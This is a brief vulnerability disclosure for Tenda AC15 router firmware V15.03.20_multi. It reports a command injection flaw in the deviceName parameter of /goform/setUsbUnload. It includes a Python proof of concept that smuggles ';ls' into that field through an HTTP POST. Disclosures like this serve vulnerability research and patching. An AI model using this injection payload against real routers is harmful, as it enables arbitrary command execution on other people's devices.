- Firmware download website: https://www.tendacn.com/us/download/detail-3851.html
AC15V1.0 V15.03.20_multi
In Tenda AC15V1.0 V15.03.20_multi firmware, we discovered a command injection vulnerablility in the deviceName
parameter and the v3
varable is directly passed to a doSystemCmd
function, causing an arbitrary command execution. The user-provided deviceName
can trigger this security vulnerability.
import requests
from pwn import*
ip = "192.168.84.101"
url = "http://" + ip + "/goform/setUsbUnload"
payload = ";ls"
data = {"deviceName": payload}
response = requests.post(url, data=data)
print(response.text)